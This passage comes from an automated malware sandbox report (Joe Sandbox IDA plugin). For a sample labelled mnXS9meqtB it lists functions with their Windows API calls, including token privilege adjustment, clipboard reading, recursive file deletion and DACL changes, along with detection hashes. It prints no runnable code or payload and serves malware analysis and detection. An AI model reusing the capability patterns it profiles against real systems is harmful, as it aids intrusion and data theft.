                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                            • String ID: Shell_TrayWnd
                                                                            • API String ID: 4125248594-2988720461
                                                                            • Opcode ID: eb853d6ad32100fb4b70fb05e4e2c7307c6f08331358cd4a7facf48b80bfd86c
                                                                            • Instruction ID: 3852534fec1cd5b5bf3f7c7de1ffbfe2d8509302de7949a881ab5990ac94cdfe
                                                                            • Opcode Fuzzy Hash: eb853d6ad32100fb4b70fb05e4e2c7307c6f08331358cd4a7facf48b80bfd86c
                                                                            • Instruction Fuzzy Hash: C8318871A4031C7BEB326B659C49F7F7F6CEB44B50F118056FA05EA1D0D6B55D00ABA0
                                                                            Function 0033ACC5 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 223COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0033B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0033B180
                                                                              • Part of subcall function 0033B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0033B1AD
                                                                              • Part of subcall function 0033B134: GetLastError.KERNEL32 ref: 0033B1BA
                                                                            • _memset.LIBCMT ref: 0033AD08
                                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0033AD5A
                                                                            • CloseHandle.KERNEL32(?), ref: 0033AD6B
                                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0033AD82
                                                                            • GetProcessWindowStation.USER32 ref: 0033AD9B
                                                                            • SetProcessWindowStation.USER32(00000000), ref: 0033ADA5
                                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0033ADBF
                                                                              • Part of subcall function 0033AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0033ACC0), ref: 0033AB99
                                                                              • Part of subcall function 0033AB84: CloseHandle.KERNEL32(?,?,0033ACC0), ref: 0033ABAB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                            • String ID: $H*;$default$winsta0
                                                                            • API String ID: 2063423040-3753542593
                                                                            • Opcode ID: ae6a7d692f9a187f39ccf05df81a35e1003676baec367f6f10bc6de0a3622e7f
                                                                            • Instruction ID: 30392ed16986af50677b4e90843777ac0a33cea42cf1c082b70d5bbc665f3d9f
                                                                            • Opcode Fuzzy Hash: ae6a7d692f9a187f39ccf05df81a35e1003676baec367f6f10bc6de0a3622e7f
                                                                            • Instruction Fuzzy Hash: 28819CB1800209AFDF12DFA4DC89EEEBBBDEF08344F054159F964A61A1D7318E54DB61
                                                                            Function 003460DD Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 174filestringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00346EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00345FA6,?), ref: 00346ED8
                                                                              • Part of subcall function 00346EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00345FA6,?), ref: 00346EF1
                                                                              • Part of subcall function 0034725E: __wsplitpath.LIBCMT ref: 0034727B
                                                                              • Part of subcall function 0034725E: __wsplitpath.LIBCMT ref: 0034728E
                                                                              • Part of subcall function 003472CB: GetFileAttributesW.KERNEL32(?,00346019), ref: 003472CC
                                                                            • _wcscat.LIBCMT ref: 00346149
                                                                            • _wcscat.LIBCMT ref: 00346167
                                                                            • __wsplitpath.LIBCMT ref: 0034618E
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 003461A4
                                                                            • _wcscpy.LIBCMT ref: 00346209
                                                                            • _wcscat.LIBCMT ref: 0034621C
                                                                            • _wcscat.LIBCMT ref: 0034622F
                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0034625D
                                                                            • DeleteFileW.KERNEL32(?), ref: 0034626E
                                                                            • MoveFileW.KERNEL32(?,?), ref: 00346289
                                                                            • MoveFileW.KERNEL32(?,?), ref: 00346298
                                                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 003462AD
                                                                            • DeleteFileW.KERNEL32(?), ref: 003462BE
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 003462E1
                                                                            • FindClose.KERNEL32(00000000), ref: 003462FD
                                                                            • FindClose.KERNEL32(00000000), ref: 0034630B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                            • String ID: \*.*$p1v`Kv
                                                                            • API String ID: 1917200108-760996285
                                                                            • Opcode ID: 7be175d77ab644779c6248493f7b2abd4ffa31049a057ddfb07a6cc5a3cb7be7
                                                                            • Instruction ID: e249d57dddf401985bce5382a4e622739d01f2c98a95cd92658a94f9d5bba1e3
                                                                            • Opcode Fuzzy Hash: 7be175d77ab644779c6248493f7b2abd4ffa31049a057ddfb07a6cc5a3cb7be7
                                                                            • Instruction Fuzzy Hash: 045101B280822C6ACB22EB91DC45DDF77FCAF05300F0505E6E585EA141DE76A7498FA5
                                                                            Function 00356B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OpenClipboard.USER32(0039DC00), ref: 00356B36
                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 00356B44
                                                                            • GetClipboardData.USER32(0000000D), ref: 00356B4C
                                                                            • CloseClipboard.USER32 ref: 00356B58
                                                                            • GlobalLock.KERNEL32(00000000), ref: 00356B74
                                                                            • CloseClipboard.USER32 ref: 00356B7E
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00356B93
                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 00356BA0
                                                                            • GetClipboardData.USER32(00000001), ref: 00356BA8
                                                                            • GlobalLock.KERNEL32(00000000), ref: 00356BB5
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00356BE9
                                                                            • CloseClipboard.USER32 ref: 00356CF6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                            • String ID:
                                                                            • API String ID: 3222323430-0
                                                                            • Opcode ID: f4dc11c548ac6760e88d9f20ed7dd39d6151d1cc95488f3bec926a886c6385b2
                                                                            • Instruction ID: 64f1c3e2ff4aa222b6be47fb43382df66ab7e0a50a1a0f562ec2587c60b2f614
                                                                            • Opcode Fuzzy Hash: f4dc11c548ac6760e88d9f20ed7dd39d6151d1cc95488f3bec926a886c6385b2
                                                                            • Instruction Fuzzy Hash: 17518D71204305ABD303AF61DD96F6E77ACAF94B12F410529F946DB1E1EF60D8098B62
                                                                            Function 0034F5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0034F62B
                                                                            • FindClose.KERNEL32(00000000), ref: 0034F67F
                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0034F6A4
                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0034F6BB
                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0034F6E2
                                                                            • __swprintf.LIBCMT ref: 0034F72E
                                                                            • __swprintf.LIBCMT ref: 0034F767
                                                                            • __swprintf.LIBCMT ref: 0034F7BB
                                                                              • Part of subcall function 0032172B: __woutput_l.LIBCMT ref: 00321784
                                                                            • __swprintf.LIBCMT ref: 0034F809
                                                                            • __swprintf.LIBCMT ref: 0034F858
                                                                            • __swprintf.LIBCMT ref: 0034F8A7
                                                                            • __swprintf.LIBCMT ref: 0034F8F6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                            • API String ID: 835046349-2428617273
                                                                            • Opcode ID: a8d36b760c790cf92941ba2d3352819f2f3ae2d40a5729d737aac52e74104ff4
                                                                            • Instruction ID: 2f84a4b665df40d37955a122e8148f001a358bcc9851308a815b5940e34b496a
                                                                            • Opcode Fuzzy Hash: a8d36b760c790cf92941ba2d3352819f2f3ae2d40a5729d737aac52e74104ff4
                                                                            • Instruction Fuzzy Hash: 22A132B1404344ABC316EBA4CC95DAFB7ECAF98704F440D1EF585CA192EB34D959CB62
                                                                            Function 00351B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?,76E18FB0,?,00000000), ref: 00351B50
                                                                            • _wcscmp.LIBCMT ref: 00351B65
                                                                            • _wcscmp.LIBCMT ref: 00351B7C
                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00351B8E
                                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 00351BA8
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00351BC0
                                                                            • FindClose.KERNEL32(00000000), ref: 00351BCB
                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00351BE7
                                                                            • _wcscmp.LIBCMT ref: 00351C0E
                                                                            • _wcscmp.LIBCMT ref: 00351C25
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00351C37
                                                                            • SetCurrentDirectoryW.KERNEL32(003B39FC), ref: 00351C55
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00351C5F
                                                                            • FindClose.KERNEL32(00000000), ref: 00351C6C
                                                                            • FindClose.KERNEL32(00000000), ref: 00351C7C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                            • String ID: *.*
                                                                            • API String ID: 1803514871-438819550
                                                                            • Opcode ID: e1ae357a44a29f58d9372356976dc75e9c955722e703507cfe30d7496c9c1cd9
                                                                            • Instruction ID: b1a4502f72f5c7c0416b6d85b6c19431bcdb2669705c59f25168c8a7bc774ce7
                                                                            • Opcode Fuzzy Hash: e1ae357a44a29f58d9372356976dc75e9c955722e703507cfe30d7496c9c1cd9
                                                                            • Instruction Fuzzy Hash: 0D31C4325403196BDF22ABB4EC89FDE77AC9F05325F110195ED11E30A0EB71DE498B64
                                                                            Function 00351C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?,76E18FB0,?,00000000), ref: 00351CAB
                                                                            • _wcscmp.LIBCMT ref: 00351CC0
                                                                            • _wcscmp.LIBCMT ref: 00351CD7
                                                                              • Part of subcall function 00346BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00346BEF
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00351D06
                                                                            • FindClose.KERNEL32(00000000), ref: 00351D11
                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00351D2D
                                                                            • _wcscmp.LIBCMT ref: 00351D54
                                                                            • _wcscmp.LIBCMT ref: 00351D6B
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00351D7D
                                                                            • SetCurrentDirectoryW.KERNEL32(003B39FC), ref: 00351D9B
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00351DA5
                                                                            • FindClose.KERNEL32(00000000), ref: 00351DB2
                                                                            • FindClose.KERNEL32(00000000), ref: 00351DC2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                            • String ID: *.*
                                                                            • API String ID: 1824444939-438819550
                                                                            • Opcode ID: fa4e69d2b829dcdd3dc62424a3e7d4647e498c8c808b7ec7de954fcf7004ce10
                                                                            • Instruction ID: 3eb04a762358737e1d0ca57876409e47e1df695b102dcd0b5952d43c1b34746e
                                                                            • Opcode Fuzzy Hash: fa4e69d2b829dcdd3dc62424a3e7d4647e498c8c808b7ec7de954fcf7004ce10
                                                                            • Instruction Fuzzy Hash: F631D23250062A6BCF23ABA0EC49FEE77BC9F45325F110591EC11A60E1DB70DE498B64
                                                                            Function 00307D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: _memset
                                                                            • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                                            • API String ID: 2102423945-2023335898
                                                                            • Opcode ID: 31f7cc66fa80f49454dadb2d42e811cb825e977e96e965a972ffa1e067e89348
                                                                            • Instruction ID: daea5477b4517712f6d2f7ac5dd887ca6136f6e4d41cb33bcadb212587c00fe0
                                                                            • Opcode Fuzzy Hash: 31f7cc66fa80f49454dadb2d42e811cb825e977e96e965a972ffa1e067e89348
                                                                            • Instruction Fuzzy Hash: 7882D171D05219CFCF26CF98C8907ADBBB1BF48310F2581A9D859AB391E734AD85CB90
                                                                            Function 0035091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLocalTime.KERNEL32(?), ref: 003509DF
                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 003509EF
                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003509FB
                                                                            • __wsplitpath.LIBCMT ref: 00350A59
                                                                            • _wcscat.LIBCMT ref: 00350A71
                                                                            • _wcscat.LIBCMT ref: 00350A83
                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00350A98
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00350AAC
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00350ADE
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00350AFF
                                                                            • _wcscpy.LIBCMT ref: 00350B0B
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00350B4A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                            • String ID: *.*
                                                                            • API String ID: 3566783562-438819550
                                                                            • Opcode ID: ba57d39847ec933cc91a6efce11ad5f44c4e36e5aa9e1b912967e4cbd126ce30
                                                                            • Instruction ID: 27cc018e85803bc217e52efbca8f2f4bdc6797a0658cbd1f1ea13f1bd605a0c9
                                                                            • Opcode Fuzzy Hash: ba57d39847ec933cc91a6efce11ad5f44c4e36e5aa9e1b912967e4cbd126ce30
                                                                            • Instruction Fuzzy Hash: 9D617A725043059FC715EF60C885DAEB3E8FF89310F04495AF989CB262DB32E949CB92
                                                                            Function 0033A66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0033ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0033ABD7
                                                                              • Part of subcall function 0033ABBB: GetLastError.KERNEL32(?,0033A69F,?,?,?), ref: 0033ABE1
                                                                              • Part of subcall function 0033ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0033A69F,?,?,?), ref: 0033ABF0
                                                                              • Part of subcall function 0033ABBB: HeapAlloc.KERNEL32(00000000,?,0033A69F,?,?,?), ref: 0033ABF7
                                                                              • Part of subcall function 0033ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0033AC0E
                                                                              • Part of subcall function 0033AC56: GetProcessHeap.KERNEL32(00000008,0033A6B5,00000000,00000000,?,0033A6B5,?), ref: 0033AC62
                                                                              • Part of subcall function 0033AC56: HeapAlloc.KERNEL32(00000000,?,0033A6B5,?), ref: 0033AC69
                                                                              • Part of subcall function 0033AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0033A6B5,?), ref: 0033AC7A
                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0033A6D0
                                                                            • _memset.LIBCMT ref: 0033A6E5
                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0033A704
                                                                            • GetLengthSid.ADVAPI32(?), ref: 0033A715
                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 0033A752
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0033A76E
                                                                            • GetLengthSid.ADVAPI32(?), ref: 0033A78B
                                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0033A79A
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0033A7A1
                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0033A7C2
                                                                            • CopySid.ADVAPI32(00000000), ref: 0033A7C9
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0033A7FA
                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0033A820
                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0033A834
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                            • String ID:
                                                                            • API String ID: 3996160137-0
                                                                            • Opcode ID: 5d94fbb41f294f99e7ea61de136ff01d8087c55167a69ce4c1604cbc5aff9fb0
                                                                            • Instruction ID: 133a3a83e97b4f76cd8d7bbcb900fcc5d23617771d874203fbadf12c6f3bf2a1
                                                                            • Opcode Fuzzy Hash: 5d94fbb41f294f99e7ea61de136ff01d8087c55167a69ce4c1604cbc5aff9fb0
                                                                            • Instruction Fuzzy Hash: 5D516DB1900609AFDF02DFA5DC85EEEBBB9FF04300F048169F951AB290DB359A45CB61
                                                                            Function 00306F07 Relevance: 20.9, Strings: 16, Instructions: 883COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: :$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$::: :
                                                                            • API String ID: 0-1407282530
                                                                            • Opcode ID: 72bd8326032c43ce8f54643fb4422ee73032581285b0c1ed8451d1770a267365
                                                                            • Instruction ID: 8cafea2047f024b056949fed8723bebc59fde332e438b9eeb90d866cf21d88f4
                                                                            • Opcode Fuzzy Hash: 72bd8326032c43ce8f54643fb4422ee73032581285b0c1ed8451d1770a267365
                                                                            • Instruction Fuzzy Hash: F3729E71E05319DBDB26DF59C8907AEB7B5FF08710F1181AAE805EB281DB709E81CB94
                                                                            Function 003463F9 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 89fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00346EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00345FA6,?), ref: 00346ED8
                                                                              • Part of subcall function 003472CB: GetFileAttributesW.KERNEL32(?,00346019), ref: 003472CC
                                                                            • _wcscat.LIBCMT ref: 00346441
                                                                            • __wsplitpath.LIBCMT ref: 0034645F
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00346474
                                                                            • _wcscpy.LIBCMT ref: 003464A3
                                                                            • _wcscat.LIBCMT ref: 003464B8
                                                                            • _wcscat.LIBCMT ref: 003464CA
                                                                            • DeleteFileW.KERNEL32(?), ref: 003464DA
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 003464EB
                                                                            • FindClose.KERNEL32(00000000), ref: 00346506
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
